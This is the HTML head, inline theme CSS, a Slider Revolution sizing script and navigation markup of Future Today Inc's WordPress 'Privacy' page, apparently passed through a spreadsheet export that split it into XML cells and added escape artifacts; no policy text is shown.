	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=no"&gt;
	&lt;title&gt;Privacy &amp;#8211; Future Today Inc&lt;/title&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel='dns-prefetch' href='//use.typekit.net' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Future Today Inc &amp;raquo; Feed" href="http://futuretodayinc.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Future Today Inc &amp;raquo; Comments Feed" href="http://futuretodayinc.com/comments/feed/" /&gt;
		&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/futuretodayinc.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.8"}};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[55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}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 important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='sb_instagram_styles-css'  href='http://futuretodayinc.com/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css'  href='http://futuretodayinc.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7.8' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-theme-css'  href='http://futuretodayinc.com/wp-includes/css/dist/block-library/theme.min.css?ver=5.7.8' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='contact-form-7-css'  href='http://futuretodayinc.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='custom-typekit-css-css'  href='https://use.typekit.net/taj0xck.css?ver=1.0.18' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='rs-plugin-settings-css'  href='http://futuretodayinc.com/wp-content/plugins/slider-revolution/public/assets/css/rs6.css?ver=6.4.6' type='text/css' media='all' /&gt;
&lt;style id='rs-plugin-settings-inline-css' type='text/css'&gt;
#rs-demo-id {}
&lt;/style&gt;
&lt;link rel='stylesheet' id='ohio-style-css'  href='http://futuretodayinc.com/wp-content/themes/ohio/style.css?ver=2.3.1' type='text/css' media='all' /&gt;
&lt;style id='ohio-style-inline-css' type='text/css'&gt;
.brand-color,.brand-color-i,.brand-color-hover-i:hover,.brand-color-hover:hover,.has-brand-color-color,.is-style-outline .has-brand-color-color,a:hover,.blog-grid:not(.blog-grid-type-2):not(.blog-grid-type-4):hover h3 a,.portfolio-item.grid-2:hover h4.title,.fullscreen-nav li</t>
  </si>
  <si>
    <t>a:hover,.socialbar.inline a:hover,.gallery .expand .ion:hover,.close .ion:hover,.accordionItem_title:hover,.tab .tabNav_link:hover,.widget .socialbar a:hover,.social-bar .socialbar a:hover,.share-bar .links a:hover,.widget_shopping_cart_content .buttons</t>
  </si>
  <si>
    <t>a.button:first-child:hover,span.page-numbers.current,a.page-numbers:hover,.main-nav .nav-item.active-main-item &gt; .menu-link,.comment-content a,.page-headline .subtitle b:before,nav.pagination li .page-numbers.active,#mega-menu-wrap &gt; ul .sub-menu &gt; li &gt; a:hover,#mega-menu-wrap &gt; ul .sub-sub-menu &gt; li &gt; a:hover,#mega-menu-wrap &gt; ul &gt; .current-menu-ancestor &gt; a,#mega-menu-wrap &gt; ul .sub-menu:not(.sub-menu-wide) .current-menu-ancestor &gt; a,#mega-menu-wrap &gt; ul .current-menu-item &gt; a,#fullscreen-mega-menu-wrap &gt; ul .current-menu-ancestor &gt; a,#fullscreen-mega-menu-wrap &gt; ul .current-menu-item &gt;</t>
  </si>
  <si>
    <t>a,.woocommerce .woo-my-nav li.is-active a,.portfolio-sorting li a.active,.widget_nav_menu .current-menu-item &gt; a,.widget_pages .current-menu-item &gt; a,.portfolio-item-fullscreen .portfolio-details-date:before,.btn.btn-link:hover,.blog-grid-content .category-holder:after,.clb-page-headline .post-meta-estimate:before,.comments-area .comment-date-and-time:after,.post .entry-content a:not(.wp-block-button__link),.project-page-content .date:before,.pagination li .btn.active,.pagination li .btn.current,.pagination li .page-numbers.active,.pagination li .page-numbers.current,.category-holder:not(.no-divider):after,.inline-divider:after,.clb-hamburger-nav .menu .nav-item:hover &gt; a.menu-link .ion,.clb-hamburger-nav .menu .nav-item .visible &gt; a.menu-link .ion,.clb-hamburger-nav .menu .nav-item.active &gt; a.menu-link .ion,.clb-hamburger-nav .menu</t>
  </si>
  <si>
    <t>.sub-nav-item:hover &gt; a.menu-link .ion,.clb-hamburger-nav .menu .sub-nav-item .visible &gt; a.menu-link .ion,.clb-hamburger-nav .menu .sub-nav-item.active &gt; a.menu-link .ion,.widgets a,.widgets a *:not(.fab),.pricing:hover .pricing_price_title,.btn-link:focus, a.btn-link:focus,.btn-link:active, a.btn-link:active,.pricing_list_item .ion,a.highlighted,.woocommerce .woocommerce-privacy-policy-text a,.blog-grid-type-6 .category-holder a.category{color:#f9ba06;}.brand-border-color,.brand-border-color-hover,.has-brand-color-background-color,.is-style-outline .has-brand-color-color,.wp-block-button__link:hover,.custom-cursor .circle-cursor--outer,.btn-brand, .btn: not(.btn-link):hover,.btn-brand:active, .btn:not(.btn-link):active,.btn-brand:focus, .btn:not(.btn-link):focus,a.button:hover,button.button:hover,.pricing:hover .btn.btn-brand{border-color:#f9ba06;}.brand-bg-color,.brand-bg-color-after,.brand-bg-color-before,.brand-bg-color-hover,.brand-bg-color-i,.brand-bg-color-hover-i,.btn-brand:not(.btn-outline),.has-brand-color-background-color,a.brand-bg-color,.wp-block-button__link:hover,.widget_price_filter .ui-slider-range,.widget_price_filter .ui-slider-handle:after,.main-nav .nav-item:before,.main-nav .nav-item.current-menu-item:before,.widget_calendar</t>
  </si>
  <si>
    <t>caption,.tag:not(.tag-portfolio):hover,.page-headline .tags .tag,.radio input:checked + .input:after,.menu-list-details .tag,.custom-cursor .circle-cursor--inner,.custom-cursor .circle-cursor--inner.cursor-link-hover,.btn-round:before,.btn:not(.btn-link):hover,.btn:not(.btn-link):active,.btn:not(.btn-link):focus,button.button:not(.btn-link):hover,a.button:not(.btn-link):hover,.btn.btn-flat:hover,.btn.btn-flat:focus,.btn.btn-outline:hover,nav.pagination li .btn.active :</t>
  </si>
  <si>
    <t>hover,.tag:not(body):hover,.tag-cloud-link:hover,.pricing_price_time:hover,.pricing:hover .btn.btn-brand{background-color:#f9ba06;}.dark-scheme .site-content,.dark-scheme.with-boxed-container .site,.dark-scheme .site-header:not(.mobile-header).header-5,.dark-scheme .site-footer,.dark-scheme .horizontal_accordionItem,.dark-scheme .clb-page-headline:before{background-color:#0a0a0a;}.site-header:not(.header-fixed):not(.mobile-header) .menu &gt; li &gt; a,.site-header:not(.header-fixed) .menu-optional .cart-total a,.site-header:not(.header-fixed) .menu-optional &gt; li &gt;</t>
  </si>
  <si>
    <t>a,.site-header:not(.header-fixed) .select-styled,.site-header:not(.header-fixed) .menu-optional .btn-round-light:not(.clb-close) .ion,.site-header:not(.header-fixed) .clb-hamburger .ion,.site-header .menu-blank,.site-branding{font-family:'niveau-grotesk', sans-serif;font-size:20px;color:#ffffff;}.mobile-header.site-header .menu &gt; li &gt; a.menu-link,.mobile-header.site-header .main-nav .nav-item a,.mobile-header.site-header .main-nav .copyright,.mobile-header.site-header .main-nav .copyright a,.mobile-header.site-header .mbl-overlay .close-bar .ion{font-family:'Niveau Grotesk', sans-serif;}.site-header{border:none;}.site-header.header-fixed{border:none;}#masthead .btn-optional{background-color:#f9ba06;border-color:#f9ba06;color:#313131;}.clb-back-link,.clb-back-link .arrow-icon{font-family:'Niveau Grotesk', sans-serif;color:#ffffff;}.clb-page-headline::after{background-color:transparent;}.clb-page-headline .clb-title{font-family:'Niveau Grotesk', sans-serif;color:#ffffff;}.header-wrap.page-container{max-width:1300px}.site-footer .page-container{max-width:1300px}.clb-subscribe-img{background-image:url('http://futuretodayinc.com/wp-content/uploads/2019/11/oh__img100.jpg');background-size:cover;background-position:center center;background-repeat:no-repeat;}.site-footer{background-color:#313131;font-size:14 px;font-style:inherit;font-weight:400;color:#ffffff;}.site-footer,.site-footer .widgets a,.site-footer .btn-flat{font-size:14 px;font-style:inherit;font-weight:400;color:#ffffff;}.site-footer .widget-title{font-size:14 px;font-style:inherit;font-weight:400;color:#ffffff;}.site-footer .site-info{font-family:'Niveau Grotesk', sans-serif;color:#ffffff;}body{font-family:'niveau-grotesk', sans-serif;font-style:normal;font-weight:400;}{font-family:'niveau-grotesk', sans-serif;font-style:normal;font-weight:800;}@media screen and (max-width: 1440px) { body { font-size:20px; } } @media screen and (max-width: 1024px) { body { font-size:20px; } } @media screen and (max-width: 768px)</t>
  </si>
  <si>
    <t>{ body { font-size:20px; } }h1,h2,h3,h4,h5,h6,.box-count,.font-titles,.fullscreen-nav .menu-link,.clb-hamburger-nav .menu .nav-item a,.site-header.mobile-header .main-nav .nav-item,.btn, .button, a.button, input[type="submit"], a.btn-link,.widget_shopping_cart_content .mini-cart-description .mini-cart-item-title &gt; a,.woo-c_product_name &gt; a:not(.woo-c_product_category),.socialbar.inline a,.vc_row .vc-bg-side-text,.counter-box-count{font-family:'niveau-grotesk', sans-serif;font-style:normal;font-weight:800;}.countdown-box .box-time .box-count,.chart-box-pie-content{font-family:'niveau-grotesk', sans-serif;font-style:normal;font-weight:800;}.countdown-box .box-time .box-count,.chart-box-pie-content{font-family:'niveau-grotesk', sans-serif;font-style:normal;font-weight:800;}.countdown-box .box-time .box-count,.chart-box-pie-content{font-family:'niveau-grotesk', sans-serif;}.portfolio-item h4,.portfolio-item h4.title,.portfolio-item h4 a,.portfolio-item-2 h4,.portfolio-item-2 h4.title,.portfolio-item-2 h4 a{font-family:'niveau-grotesk', sans-serif;font-style:normal;font-weight:800;font-size:inherit;line-height:inherit;}.blog-item h3.title{font-family:'niveau-grotesk', sans-serif;font-style:normal;font-weight:800;line-height:initial;}.blog-item h3.title a{font-size:initial;}.portfolio-item-2 h4{font-family:'niveau-grotesk', sans-serif;font-style:normal;font-weight:800;}@media screen and (max-width: 1440px) { h1 { font-size:h1 {   font-size: 30px; }; } } @media screen and (max-width: 1024px) { h1 { font-size:h1 {   font-size: 30px; }; } } @media screen and (max-width: 768px) { h1 { font-size:h1 {   font-size: 30px; }; } }@media screen and (max-width: 1440px) { h2 { font-size:30px; } } @media screen and (max-width: 1024px) { h2 { font-size:30px; } } @media screen and (max-width: 768px) { h2 { font-size:30px; } }@media screen and (max-width: 1440px) { h3 { font-size:25px; } } @media screen and (max-width: 1024px) { h3 { font-size:25px; } } @media screen and (max-width: 768px) { h3 { font-size:25px; } }p.subtitle,.subtitle-font,.heading .subtitle{font-family:'niveau-grotesk', sans-serif;font-weight:700;}{font-family:'niveau-grotesk', sans-serif;font-weight:700;}.portfolio-item .subtitle-font,.woocommerce ul.products li.product .subtitle-font.category,.woocommerce ul.products li.product .subtitle-font.category &gt; a{font-family:'niveau-grotesk', sans-serif;font-weight:700;font-size:inherit;line-height:inherit;}.contact-form.classic input::-webkit-input-placeholder,.contact-form.classic textarea::-webkit-input-placeholder,input.classic::-webkit-input-placeholder,input.classic::-moz-placeholder{font-family:'niveau-grotesk', sans-serif;font-weight:700;}.contact-form.classic input::-moz-placeholder,.contact-form.classic textarea::-moz-placeholder{font-family:'niveau-grotesk', sans-serif;font-weight:700;}input.classic:-ms-input-placeholder,.contact-form.classic input:-ms-input-placeholder,.contact-form.classic textarea:-ms-input-placeholder{font-family:'niveau-grotesk', sans-serif;font-weight:700;}.blog-grid-content .blog-grid-headline a{font-family:'niveau-grotesk', sans-serif;}.blog-grid-content p{font-family:'niveau-grotesk', sans-serif;}.blog-grid-content .btn-link{font-family:'niveau-grotesk', sans-serif;}.blog-grid .date{font-family:'niveau-grotesk', sans-serif;}body { font-family: niveau-grotesk, sans-serif !</t>
  </si>
  <si>
    <t>important; }.team-member {width: 100%;position: relative;text-align: center;}.category-holder {display: none;}.post-meta-estimate {display: none;}element.style {}.blog-grid:not(.blog-grid-type-4):not(.blog-grid-type-6) .blog-grid-meta {color: #fff;display: none;}.single-post .entry-content a:not(.wp-block-button__link):hover {opacity: 1;}::marker {color: #f9ba06;}.btn-small, a.btn-small, .product-item .btn-wishlist {padding: 7px 30px;font-size: 0.96rem;}.clb-slider-nav-btn {position: absolute;padding: 4.4vh;bottom: 0;right: 0;min-width: 120px;display: -webkit-box;display: -webkit-flex;display: -ms-flexbox;display: flex;-webkit-box-pack: justify;-webkit-justify-content: space-between;-ms-flex-pack: justify;justify-content: space-between;z-index: 1;margin-bottom: -50px;}.clb-slider-nav-dots, .clb-slider-pagination {position: absolute;width: 100%;bottom: -73px;padding: 0;margin: 0;text-align: center;z-index: 3;}.site-footer {font-weight: 400;color: #ffffff;font-size: 14px;}blockquote, q {margin: 25px 0;padding-left: 3.4vh;padding-right: 3.4vh;quotes: "" "";position: relative;border-left: 5px solid #f9ba06;}.vc__vertical_offset {z-index: 1;} @media screen and (min-width:1025px){.clb-page-headline{min-height:600px;}.main-nav .nav-item a {padding: 0 2.24vw;}} @media screen and (min-width:769px) and (max-width:1024px){} @media screen and (max-width:768px){#masthead .btn-optional {background-color: #191f23;border-color: #191f23;display: none;}.site-footer .left, .site-footer .right {width: 100%;text-align: center;}.widget {padding-top: 30px;text-align: center;}}
&lt;/style&gt;
&lt;link rel='stylesheet' id='tablepress-default-css'  href='http://futuretodayinc.com/wp-content/plugins/tablepress/css/default.min.css?ver=1.13' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='js_composer_front-css'  href='http://futuretodayinc.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.6.0' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='http://futuretodayinc.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://futuretodayinc.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://futuretodayinc.com/wp-content/plugins/slider-revolution/public/assets/js/rbtools.min.js?ver=6.4.4' id='tp-tools-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://futuretodayinc.com/wp-content/plugins/slider-revolution/public/assets/js/rs6.min.js?ver=6.4.6' id='revmin-js'&gt;&lt;/script&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://futuretodayinc.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://futuretodayinc.com/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 5.7.8" /&gt;
&lt;link rel="canonical" href="http://futuretodayinc.com/privacy/" /&gt;
&lt;link rel='shortlink' href='http://futuretodayinc.com/?p=22963' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="http://futuretodayinc.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ffuturetodayinc.com%2Fprivacy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="http://futuretodayinc.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ffuturetodayinc.com%2Fprivacy%2F&amp;#038;format=xml" /&gt;
&lt;style type="text/css"&gt;.recentcomments a{display:inline !important;padding:0 !</t>
  </si>
  <si>
    <t>important;margin:0 ! important;}&lt;/style&gt;&lt;meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress. "/&gt;
&lt;meta name="generator" content="Powered by Slider Revolution 6.4.6 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."</t>
  </si>
  <si>
    <t>/&gt;
&lt;link rel="icon" href="http://futuretodayinc.com/wp-content/uploads/2021/04/cropped-favicon-32x32.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="http://futuretodayinc.com/wp-content/uploads/2021/04/cropped-favicon-192x192.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="http://futuretodayinc.com/wp-content/uploads/2021/04/cropped-favicon-180x180.png" /&gt;
&lt;meta name="msapplication-TileImage" content="http://futuretodayinc.com/wp-content/uploads/2021/04/cropped-favicon-270x270.png" /&gt;
_x005F_x000D_
&lt;!-- BEGIN Typekit Fonts for WordPress --&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="https://use.typekit.net/taj0xck.css"&gt;_x005F_x000D_
&lt;style type="text/css"&gt;_x005F_x000D_
body { font-family: niveau-grotesk, sans-serif; }_x005F_x000D_
_x005F_x000D_
.h1, h1 { font-family: niveau-grotesk, sans-serif;_x005F_x000D_
                     font-family: inherit;_x005F_x000D_
                      letter-spacing: 0px;_x005F_x000D_
font-size: 35px;_x005F_x000D_
    font-weight: 400;_x005F_x000D_
    line-height: 45px;_x005F_x000D_
    line-height: 1.1;_x005F_x000D_
    color: inherit; }_x005F_x000D_
_ x000D_
h2 { font-family: niveau-grotesk, sans-serif;_x005F_x000D_
                     font-family: inherit;_x005F_x000D_
                  font-weight: 700;_x005F_x000D_
font-size: 30px;_x005F_x000D_
    line-height: 1.1;_x005F_x000D_
    color: inherit; }_x005F_x000D_
_x005F_x000D_
h3 { font-family: niveau-grotesk, sans-serif;_x005F_x000D_
                     font-family: inherit;_x005F_x000D_
                  font-weight: 700;_x005F_x000D_
    line-height: 1.1;_x005F_x000D_
    color: inherit; }_x005F_x000D_
_x005F_x000D_
h6 { font-family: niveau-grotesk, sans-serif;_x005F_x000D_
                     font-family: inherit;_x005F_x000D_
                  font-weight: 700;_x005F_x000D_
font-size: 25px;_x005F_x000D_
    line-height: 1.1;_x005F_x000D_
    color: inherit; }&lt;/style&gt;_x005F_x000D_
_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>END Typekit Fonts for WordPress --&gt;_x005F_x000D_
_x005F_x000D_
&lt;script type="text/javascript"&gt;function setREVStartSize(e){_x005F_x000D_
			//window.requestAnimationFrame(function() {				 _x005F_x000D_
				window. RSIW = window.RSIW===undefined ? window.innerWidth : window.</t>
  </si>
  <si>
    <t>RSIW;	_x005F_x000D_
				window. RSIH = window. RSIH===undefined ?</t>
  </si>
  <si>
    <t>window.innerHeight : window. RSIH;	_x005F_x000D_
				try {								_x005F_x000D_
					var pw = document.getElementById(e.c).parentNode.offsetWidth,_x005F_x000D_
						newh;_x005F_x000D_
					pw = pw===0 || isNaN(pw) ?</t>
  </si>
  <si>
    <t>window. RSIW : pw;_x005F_x000D_
					e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);_x005F_x000D_
					e.thumbw = e.thumbw===undefined ? 0</t>
  </si>
  <si>
    <t>: parseInt(e.thumbw);_x005F_x000D_
					e.tabh = e.tabh===undefined ? 0 :</t>
  </si>
  <si>
    <t>parseInt(e.tabh);_x005F_x000D_
					e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);_x005F_x000D_
					e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);_x005F_x000D_
					e.thumbhide = e.thumbhide===undefined ? 0</t>
  </si>
  <si>
    <t>: parseInt(e.thumbhide);_x005F_x000D_
					e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0);		_x005F_x000D_
					if(e.layout==="fullscreen" || e.l==="fullscreen") 						_ x000D_
						newh = Math.max(e.mh,window. RSIH)</t>
  </si>
  <si>
    <t>;					_x005F_x000D_
					else{					_x005F_x000D_
						e.gw = Array.isArray(e.gw) ? e.gw : [e.gw];_x005F_x000D_
						for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];					_x005F_x000D_
						e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) &amp;&amp; e.el.length==0)? e.gh : e.el;_x005F_x000D_
						e.gh = Array.isArray(e.gh) ?</t>
  </si>
  <si>
    <t>e.gh : [e.gh];_x005F_x000D_
						for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];_x005F_x000D_
											_x005F_x000D_
						var nl = new Array(e.rl.length),_x005F_x000D_
							ix = 0,						_x005F_x000D_
							sl;					_x005F_x000D_
						 e.tabw = e.tabhide&gt;=pw ?</t>
  </si>
  <si>
    <t>0 : e.tabw;_x005F_x000D_
						e.thumbw = e.thumbhide&gt;=pw ? 0</t>
  </si>
  <si>
    <t>: e.thumbw;_x005F_x000D_
						e.tabh = e.tabhide&gt;=pw ? 0 : e.tabh;_x005F_x000D_
						e.thumbh = e.thumbhide&gt;=pw ? 0 : e.thumbh;					_x005F_x000D_
						for (var i in e.rl) nl[i] = e.rl[i]&lt;window.RSIW ? 0 :</t>
  </si>
  <si>
    <t>e.rl[i];_x005F_x000D_
						sl = nl[0];									_x005F_x000D_
						for (var i in nl) if (sl&gt;nl[i] &amp;&amp; nl[i]&gt;0) { sl = nl[i]; ix=i;}															_x005F_x000D_
						var m = pw&gt;(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]);					_x005F_x000D_
						newh =  (e.gh[ix] * m)</t>
  </si>
  <si>
    <t>+ (e.tabh + e.thumbh);_x005F_x000D_
					}				_x005F_x000D_
					if(window.rs_init_css===undefined) window.rs_init_css = document.head.appendChild(document.createElement("style"));					_x005F_x000D_
					 document.getElementById(e.c).height = newh+"px";_x005F_x000D_
					window.rs_init_css.innerHTML += "#"+e.c+"_wrapper { height: "+newh+"px }";				_x005F_x000D_
				} catch(e){_x005F_x000D_
					console.log("Failure at Presize of Slider:" + e)_x005F_x000D_
				}					   _x005F_x000D_
			//});_x005F_x000D_
		  };&lt;/script&gt;
		&lt;style type="text/css" id="wp-custom-css"&gt;
			body { font-family: niveau-grotesk, sans-serif !</t>
  </si>
  <si>
    <t>important; }
		&lt;/style&gt;
		&lt;style type="text/css" data-type="vc_shortcodes-custom-css"&gt;.vc_custom_1620208204330{background-color: #131313 ! important;}.vc_custom_1616782685686{background-color: #f8f8f8 !important;}.vc_custom_1592462417874{padding-right: 0px ! important;padding-left: 0px !</t>
  </si>
  <si>
    <t>important;}&lt;/style&gt;&lt;noscript&gt;&lt;style&gt; .wpb_animate_when_almost_visible { opacity: 1; }&lt;/style&gt;&lt;/noscript&gt;&lt;/head&gt;
&lt;body class="page-template-default page page-id-22963 wp-embed-responsive ohio-theme-2-0-0 with-header-1 custom-cursor wpb-js-composer js-comp-ver-6.6.0 vc_responsive elementor-default elementor-kit-21884"&gt;
&lt;div class="page-preloader " id="page-preloader"&gt;
		&lt;div class="sk-folding-cube sk-preloader"&gt;
				        &lt;div class="sk-cube1 sk-cube"&gt;&lt;/div&gt;
				        &lt;div class="sk-cube2 sk-cube"&gt;&lt;/div&gt;
				        &lt;div class="sk-cube4 sk-cube"&gt;&lt;/div&gt;
				        &lt;div class="sk-cube3 sk-cube"&gt;&lt;/div&gt;
				      &lt;/div&gt;&lt;/div&gt;
    &lt;ul class="elements-bar left"&gt;
                    &lt;li&gt;
&lt;/li&gt;
            &lt;/ul&gt;
    &lt;ul class="elements-bar right"&gt;
                    &lt;li&gt;
&lt;/li&gt;
            &lt;/ul&gt;
	&lt;div class="circle-cursor circle-cursor--outer"&gt;&lt;/div&gt;
	&lt;div class="circle-cursor circle-cursor--inner"&gt;&lt;/div&gt;
	&lt;div id="page" class="site"&gt;
		&lt;a class="skip-link screen-reader-text" href="#main"&gt;Skip to content&lt;/a&gt;
&lt;header id="masthead" class="site-header header-1 without-mobile-search hamburger-position-left mobile-hamburger-position-right extended-menu"
	 data-header-fixed="true"		 data-fixed-initial-offset="150"&gt;
	&lt;div class="header-wrap"&gt;
		&lt;div class="header-wrap-inner"&gt;
			&lt;div class="left-part"&gt;
&lt;div class="site-branding"&gt;
	&lt;a class="site-title font-titles" href="http://futuretodayinc.com/" rel="home"&gt;
		&lt;div class="logo"&gt;
							&lt;img src="http://futuretodayinc.com/wp-content/uploads/2021/03/ft-logo-dark.png" class=""  alt="Future Today Inc" &gt;
					&lt;/div&gt;
		&lt;div class="fixed-logo"&gt;
							&lt;img src="http://futuretodayinc.com/wp-content/uploads/2021/03/ft-logo-light.png"  alt="Future Today Inc"&gt;
					&lt;/div&gt;
						&lt;div class="for-onepage"&gt;
			&lt;span class="dark hidden"&gt;
									&lt;img src="http://futuretodayinc.com/wp-content/uploads/2021/03/ft-logo-dark.png"   alt="Future</t>
  </si>
  <si>
    <t xml:space="preserve">Today Inc"&gt;
							&lt;/span&gt;
			&lt;span class="light hidden"&gt;
									&lt;img src="http://futuretodayinc.com/wp-content/uploads/2021/03/ft-logo-light.png"  alt="Future Today Inc"&gt;
							&lt;/span&gt;
		</t>
  </si>
  <si>
    <t>&lt;/div&gt;
	&lt;/a&gt;
&lt;/div&gt;	
			&lt;/div&gt;
	        &lt;div class="right-part"&gt;
&lt;nav id="site-navigation" class="main-nav with-mobile-menu" data-mobile-menu-second-click-link=""&gt;
    &lt;!-- Mobile overlay --&gt;
    &lt;div class="mbl-overlay menu-mbl-overlay"&gt;
        &lt;div class="mbl-overlay-bg"&gt;&lt;/div&gt;
        &lt;!-- Close bar --&gt;
        &lt;div class="close-bar text-left"&gt;
            &lt;div class="btn-round btn-round-light clb-close" tabindex="0"&gt;
                &lt;i class="ion ion-md-close"&gt;&lt;/i&gt;
            &lt;/div&gt;
            &lt;!--</t>
  </si>
  <si>
    <t>Search --&gt;
        &lt;/div&gt;
        &lt;div class="mbl-overlay-container"&gt;
            &lt;!-- Navigation --&gt;
            &lt;div id="mega-menu-wrap" class="main-nav-container"&gt;
                &lt;ul id="primary-menu" class="menu"&gt;&lt;li id="nav-menu-item-22268-64373cd868382" class="mega-menu-item nav-item menu-item-depth-0 "&gt;&lt;a href="http://futuretodayinc.com/about-us/" class="menu-link main-menu-link item-title"&gt;&lt;span&gt;About Us&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="nav-menu-item-22273-64373cd8688f2" class="mega-menu-item nav-item menu-item-depth-0 has-submenu "&gt;&lt;a href="#" class="menu-link main-menu-link item-title"&gt;&lt;span&gt;Partner with Us&lt;/span&gt;&lt;div class="has-submenu-icon"&gt;&lt;i class="menu-plus ion ion-md-add"&gt;&lt;/i&gt;&lt;i class="menu-chevron ion ion-ios-arrow-down"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/a&gt;
&lt;div class="sub-nav"&gt;&lt;ul class="menu-depth-1 sub-menu sub-nav-group" &gt;
	&lt;li id="nav-menu-item-23375-64373cd8689fc" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/advertise-with-us/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Advertise With Us&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
	&lt;li id="nav-menu-item-22271-64373cd868af3" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/distribute-your-content/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Distribute Your Content&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li id="nav-menu-item-22274-64373cd868bdc" class="mega-menu-item nav-item menu-item-depth-0 has-submenu "&gt;&lt;a href="#" class="menu-link main-menu-link item-title"&gt;&lt;span&gt;Media&lt;/span&gt;&lt;div class="has-submenu-icon"&gt;&lt;i class="menu-plus ion ion-md-add"&gt;&lt;/i&gt;&lt;i class="menu-chevron ion ion-ios-arrow-down"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/a&gt;
&lt;div class="sub-nav"&gt;&lt;ul class="menu-depth-1 sub-menu sub-nav-group" &gt;
	&lt;li id="nav-menu-item-22487-64373cd868ce1" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/press-releases/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Press Releases&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
	&lt;li id="nav-menu-item-22485-64373cd868de9" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/media-coverage/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Media Coverage&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
	&lt;li id="nav-menu-item-22486-64373cd868eea" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/media-kit/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Media Kit&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;ul id="mobile-menu" class="mobile-menu"&gt;&lt;li id="nav-menu-item-22268-64373cd869881" class="mega-menu-item nav-item menu-item-depth-0 "&gt;&lt;a href="http://futuretodayinc.com/about-us/" class="menu-link main-menu-link item-title"&gt;&lt;span&gt;About Us&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
